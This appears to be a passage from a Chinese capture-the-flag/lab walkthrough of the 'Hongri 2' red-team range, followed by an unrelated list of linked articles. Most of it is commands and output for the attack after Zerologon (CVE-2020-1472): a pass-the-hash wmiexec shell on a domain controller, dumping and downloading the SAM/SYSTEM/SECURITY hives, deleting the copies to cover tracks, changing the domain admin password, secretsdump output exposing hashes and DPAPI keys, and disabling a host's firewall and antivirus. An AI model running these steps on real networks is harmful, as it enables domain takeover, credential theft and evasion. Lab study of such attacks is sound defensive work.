└─# proxychains impacket-wmiexec -hashes aad3b435b51404eeaad3b435b51404ee:a57b337d9b973245b58a09442ff15e2a ./administrator@10.10.10.10
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.11.0 - Copyright 2023 Fortra

[proxychains] Strict chain  ...  127.0.0.1:2222  ...  10.10.10.10:445  ...  OK
[*] SMBv3.0 dialect used
[proxychains] Strict chain  ...  127.0.0.1:2222  ...  10.10.10.10:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:2222  ...  10.10.10.10:49154  ...  OK
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>hostname
DC

5、注册表操作

从注册表导出文件。
通过导出 sam system 等文件到本地,获取域控机器上本地保存之前的 hash 值用于恢复,不然就脱域了


C:\>reg save HKLM\SYSTEM system.save
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute wmiexec.py again with -codec and the corresponding codec
�����ɹ���ɡ�

C:\>reg save HKLM\SAM sam.save
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute wmiexec.py again with -codec and the corresponding codec
�����ɹ���ɡ�

C:\>reg save HKLM\SECURITY security.save
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute wmiexec.py again with -codec and the corresponding codec
�����ɹ���ɡ�


C:\>lget sam.save
[*] Downloading C:\\sam.save
C:\>lget security.save
[*] Downloading C:\\security.save
C:\>lget system.save
[*] Downloading C:\\system.save
C:\>del *.save

C:\>dir
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute wmiexec.py again with -codec and the corresponding codec
 ������ C �еľ�û�б�ǩ��
 ��������� 92FD-8733

 C:\ ��Ŀ¼

2019/09/08  18:57    <DIR>          101cde781c961a208b
2013/08/22  23:52    <DIR>          PerfLogs
2013/08/22  22:50    <DIR>          Program Files
2013/08/22  23:39    <DIR>          Program Files (x86)
2023/11/15  20:37        12,443,648 system
2019/09/09  10:47    <DIR>          Users
2023/11/15  20:42    <DIR>          Windows
               1 ���ļ�     12,443,648 �ֽ�
               6 ��Ŀ¼ 54,895,259,648 �����ֽ�
               
把文件下载下来,然后我们在把靶机内导出的文件删掉。清理痕迹!

C:\>net user administrator Admin12345 /domain
[proxychains] Strict chain  ...  127.0.0.1:2222  ...  10.10.10.10:135  ...  OK
[-] rpc_s_access_denied
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute wmiexec.py again with -codec and the corresponding codec
����ɹ���ɡ�


顺便把DC管理员的密码改掉。

┌──(root㉿ru)-[~/lianxi/CVE-2020-1472-master/CVE-2020-1472_1/CVE-2020-1472]
└─# impacket-secretsdump -sam sam.save -system system.save -security security.save LOCAL  
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0x36b82df4d5de2cba91f72711f5749d34
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:bf788a393de70614611160ff1f27b7634f93f5b1675ae31881127c992f6bc341f59d41100fc85750c41c7024dbed8976cc32ee04b1f010ebc0bc93b2eb90aef99bf89b1e9e3d06e6859a823453ecb399c81c1969b64a57d5495836003e59d2425feed96d1752d73eb12ce6e48ea9cbf8f8be1bb39396d2979a6d3e1b04beb603b7dfed53ee26effa4213cfccd9480fd015c767eb5689eb3d3bfb090a06c1554a829321020f283c21cae5297ec160bc5e0f5191e1a1df3db3bf415f87428ef76579cc0c8de28f0aaf8864a11147fdc6bab79326c7c01d1a029580b36248c20f84d0ead0f793938ec0a5c76edcc9d9513c
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:94827aa0325b11b5c2daec613a78fcf3
[*] DefaultPassword
(Unknown User):1qaz@WSX
[*] DPAPI_SYSTEM
dpapi_machinekey:0xde6b10d6d12d66d06882ab42529a45f2dd174b18
dpapi_userkey:0xb420d078382eb774b299d179ec66737a49dbe082
[*] NL$KM
 0000   70 2E 7E 6C C8 DD E9 BF  D5 C8 FE A2 F4 DE E4 35   p.~l...........5
 0010   12 91 CE 0D BB 75 12 63  82 4E 76 E0 A8 CA 2D ED   .....u.c.Nv...-.
 0020   F2 18 6B 73 64 5F E0 40  58 B5 F8 74 D1 7C E5 B5   ..ksd_.@X..t.|..
 0030   0C B9 53 1D 21 B0 8B 81  3A 2A 28 DC 90 F2 03 92   ..S.!...:*(.....
NL$KM:702e7e6cc8dde9bfd5c8fea2f4dee4351291ce0dbb751263824e76e0a8ca2dedf2186b73645fe04058b5f874d17ce5b50cb9531d21b08b813a2a28dc90f20392
[*] Cleaning up...


这条命令使用 Impacket 中的 impacket-secretsdump 工具来从本地系统中提取存储在 SAM、System 和 Security 注册表文件中的凭据信息。

具体来说,-sam sam.save、-system system.save 和 -security security.save 参数用于指定存储提取的凭据信息的文件名。LOCAL 参数指定了要提取本地系统的凭据信息。

然后我们使用reinstall_original_pw.py这个脚本就行密码恢复
之后通过 sam.save、security.save、system.save  这些文件获得原来域控机器上的 Ntlm Hash 值,用于恢复密码。


┌──(root㉿ru)-[~/lianxi/CVE-2020-1472-master/CVE-2020-1472_1/CVE-2020-1472]
└─# proxychains python3 reinstall_original_pw.py dc 10.10.10.10 bf788a393de70614611160ff1f27b7634f93f5b1675ae31881127c992f6bc341f59d41100fc85750c41c7024dbed8976cc32ee04b1f010ebc0bc93b2eb90aef99bf89b1e9e3d06e6859a823453ecb399c81c1969b64a57d5495836003e59d2425feed96d1752d73eb12ce6e48ea9cbf8f8be1bb39396d2979a6d3e1b04beb603b7dfed53ee26effa4213cfccd9480fd015c767eb5689eb3d3bfb090a06c1554a829321020f283c21cae5297ec160bc5e0f5191e1a1df3db3bf415f87428ef76579cc0c8de28f0aaf8864a11147fdc6bab79326c7c01d1a029580b36248c20f84d0ead0f793938ec0a5c76edcc9d9513c
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Performing authentication attempts...
[proxychains] Strict chain  ...  127.0.0.1:2222  ...  10.10.10.10:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:2222  ...  10.10.10.10:49158  ...  OK

NetrServerAuthenticate3Response
ServerCredential:
    Data:                            b'H\x10&\xc3C1\x0cv'
NegotiateFlags:                  556793855
AccountRid:                      1002
ErrorCode:                       0


server challenge b'H\xc3\x9dJ\xed\xa5\xfa,'
session key b"\xc6_\xe8\xed\xde\xcaQ\xb2.n'7&\x98\x9c."
NetrServerPasswordSetResponse
ReturnAuthenticator:
    Credential:
        Data:                            b'\x01\x86tAKiC='
    Timestamp:                       0
ErrorCode:                       0



Success! DC machine account should be restored to it's original value. You might want to secretsdump again to check.

┌──(root㉿ru)-[~/lianxi/CVE-2020-1472-master/CVE-2020-1472_1/CVE-2020-1472]
└─# proxychains impacket-secretsdump de1ay.com/dc\$@10.10.10.10 -no-pass
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.11.0 - Copyright 2023 Fortra

[proxychains] Strict chain  ...  127.0.0.1:2222  ...  10.10.10.10:445  ...  OK
[-] RemoteOperations failed: SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
[*] Cleaning up...

可以看到我们使用空密码去获取域内的所有用户的凭证已经不行了
发现登不上去了。

6、get DC

我们在web机内进行远程登录到dc机

mstsc


7、get PC

我们在域控内直接进行操作。


在AD域内找到了PC和WEB机,我们ping一下PC机。发现他的ip是10.10.10.201


知道ip后,我们可以直接在域控制器内进行mstsc远程连接。直接使用域控管理员的账号:administrator  密码:Admin12345,我们把pc机内的防火墙以及杀毒软件关闭。

到此我们的红日二就打完了。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1332572.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【测试开发】测试用例讲解

文章目录 目录 文章目录 前言 一、测试用例的基本要素 二、测试用例的设计方法 1.基于需求的设计方法 对日历根据web界面的功能布局分析出的功能框图如下&#xff1a; 继续举一个例子百度云盘非功能测试的案例&#xff1a; 2.等价类 3.边界值 5.正交表 6.场景设计法 7…

什么等等? I/O Wait ≠ I/O 瓶颈?

本文地址&#xff1a;什么等等&#xff1f; I/O Wait ≠ I/O 瓶颈&#xff1f; | 深入浅出 eBPF 1. I/O Wait 定义2. 测试验证3. 进一步明确磁盘吞吐和读写频繁进程4. 内核 CPU 统计实现分析5. 总结参考资料 1. I/O Wait 定义 I/O Wait 是针对单个 CPU 的性能指标&#xff0…

使用Python实现发送Email电子邮件【第19篇—python发邮件】

文章目录 &#x1f47d;使用Python实现发送Email电子邮件&#x1f3b6;实现原理&#x1f3c3;Python实现发送Email电子邮件-基础版&#x1f46b;实现源码&#x1f646;源码解析 &#x1f487;Python实现发送Email电子邮件-完善版&#x1f46b;实现源码&#x1f646;源码解析&am…

【贪心】单源最短路径Python实现

文章目录 [toc]问题描述Dijkstra算法Dijkstra算法应用示例时间复杂性Python实现 个人主页&#xff1a;丷从心 系列专栏&#xff1a;贪心算法 问题描述 给定一个带权有向图 G ( V , E ) G (V , E) G(V,E)&#xff0c;其中每条边的权是非负实数&#xff0c;给定 V V V中的一个…

婚庆婚礼策划服务网站建设的效果如何

品牌效应越来越重要&#xff0c;婚庆行业在多年的发展下&#xff0c;部分区域内也跑出了头部品牌&#xff0c;连锁门店也开了很多家&#xff0c;无论新品牌还是老品牌在新的区域开店总归少不了线上线下的宣传&#xff0c;虽然几乎每个人都会接触婚庆服务&#xff0c;但因为市场…

HarmonyOS构建第一个JS应用(FA模型)

构建第一个JS应用&#xff08;FA模型&#xff09; 创建JS工程 若首次打开DevEco Studio&#xff0c;请点击Create Project创建工程。如果已经打开了一个工程&#xff0c;请在菜单栏选择File > New > Create Project来创建一个新工程。 选择Application应用开发&#xf…

操作系统——进程管理算法和例题

1、概述 1.1 进程调度 当进程的数量往往多于处理机的个数&#xff0c;出现进程争用处理机的现象&#xff0c;处理机调度是对处理机进行分配&#xff0c;就是从就绪队列中&#xff0c;按照一定的算法&#xff08;公平、髙效&#xff09;选择一个进程并将处理机分配给它运行&am…

各种边缘检测算子的比较研究

边缘检测算子比较研究 文章目录 边缘检测算子比较研究一、引言1.1 边缘检测的重要性1.2 研究背景与意义1.3 研究目的和论文结构 二、文献综述2.1 边缘检测概述2.2 Roberts、Prewitt、Sobel、Laplacian 和 Canny 算子的理论基础和历史2.2.1 **Roberts算子&#xff1a;**2.2.2 **…

给定一个数列,每一次操作可以使a[i]变成x,y,满足x + y = a[i] + k, 求使所有数字相同的最少操作次数

题目 思路&#xff1a; #include<bits/stdc.h> using namespace std; #define int long long const int maxn 2e5 5; int a[maxn], b[maxn], c[maxn]; void solve(){int n, k;cin >> n >> k;int g 0;for(int i 1; i < n; i){cin >> a[i];a[i] …

“FPGA+MDIO总线+UART串口=高效读写PHY芯片寄存器!“(含源代码)

1、概述 前文对88E1518芯片的端口芯片及原理图进行了讲解&#xff0c;对MDIO的时序也做了简单的讲解。本文通过Verilog HDL去实现MDIO&#xff0c;但是88E1518芯片对不同页的寄存器读写需要切换页&#xff0c;无法直接访问寄存器&#xff0c;如果通过代码读写某些固定寄存器的话…

华为HCIA认证H12-811题库新增

801、[单选题]178/832、在系统视图下键入什么命令可以切换到用户视图? A quit B souter C system-view D user-view 试题答案&#xff1a;A 试题解析&#xff1a;在系统视图下键入quit命令退出到用户视图。因此答案选A。 802、[单选题]“网络管理员在三层交换机上创建了V…

揭秘NCO:数字领域的音乐之旅

好的&#xff0c;让我们更详细地解析NCO的数学奥秘&#xff0c;深入探讨数字音乐的乐谱。在我们深入数学公式之前&#xff0c;让我们回顾一下&#xff0c;NCO就像是一位神奇的音符设计师&#xff0c;创造数字音乐的灵感源泉。 NCO&#xff1a;数字音符的魔法创造者 NCO&#x…

AI日报:2024年人工智能对各行业初创企业的影响

欢迎订阅专栏 《AI日报》 获取人工智能邻域最新资讯 文章目录 2024年人工智能对初创企业的影响具体行业医疗金融服务运输与物流等 新趋势 2024年人工智能对初创企业的影响 2023年见证了人工智能在各个行业的快速采用和创新。随着我们步入2024年&#xff0c;人工智能初创公司正…

lv13 环境搭建SD卡启动

一、制作SD卡启动盘 1.1 方法1&#xff1a;在Linux下制作 一、准备好烧录脚本 cd ~/fs4412 ​ unzip sdfuse_q.zip ​ cd sdfuse_q ​ chmod x *.sh 二、将SD卡插入USB读卡器&#xff0c;并连接到虚拟机 或者 一般识别的sd卡会在dev目录下显示sdb 三、烧录 cp ../u-boot-f…

Qt 网络编程

QT 网络编程 TCP 编程 模块引入 QT network 头文件 #include <QTcpServer> // TCP服务器端使用 #include <QTcpSocket> // TCP服务器和客户端都使用 编程流程 服务端 1&#xff09;实例化 QTcpServer 对象 -----------------------------> socket 2&#x…

Python~字典快速上手

目录 Key的重要性 一 创建字典{} 二 字典用key查找 in(遍历)和[]用key查找 keyerror in和[]的效率对比 三 字典的插入/修改/删除(先查找) ​编辑 四 字典增删查改/遍历的效率 五 字典的遍历 for遍历可迭代对象拿到key 与创建顺序相同 keys/values/items方法 六 可…

基于Java+SpringBoot+MyBatis-plus+Vue前后端分离小区管理系统设计与实现2.0

博主介绍&#xff1a;✌全网粉丝5W&#xff0c;全栈开发工程师&#xff0c;从事多年软件开发&#xff0c;在大厂呆过。持有软件中级、六级等证书。可提供微服务项目搭建与毕业项目实战&#xff0c;博主也曾写过优秀论文&#xff0c;查重率极低&#xff0c;在这方面有丰富的经验…

抖店一件代发实操,干货满满!

我是电商珠珠 没有货源的新手&#xff0c;在店铺刚开始的时候可以搞无货源模式&#xff0c;也就是一件代发&#xff0c;去搬运别人店铺的商品到自己店铺&#xff0c;再去利用信息差去赚取差价。 很多人不知道具体要怎么做&#xff0c;今天我就来给大家讲一讲。 一、入驻 入…

NNDL 作业12-优化算法2D可视化 [HBU]

老师作业原博客地址&#xff1a;【23-24 秋学期】NNDL 作业12 优化算法2D可视化-CSDN博客 目录 简要介绍图中的优化算法&#xff0c;编程实现并2D可视化 1. 被优化函数 ​编辑 深度学习中的优化算法总结 - ZingpLiu - 博客园 (cnblogs.com) SGD: Adagrad: RMSprop: Mom…

Unity新动画系统之动画层和动画遮罩

Unity新动画系统之动画层和动画遮罩 一、介绍二、动画骨骼遮罩层使用第一种就是create一个avatar Mask,如下&#xff1a;第二种遮罩&#xff0c;就是直接在动画剪辑的属性上更改&#xff0c;如图一为humanoid类型的动画剪辑属性&#xff1a; 一、介绍 之前分享过FSM动画控制系…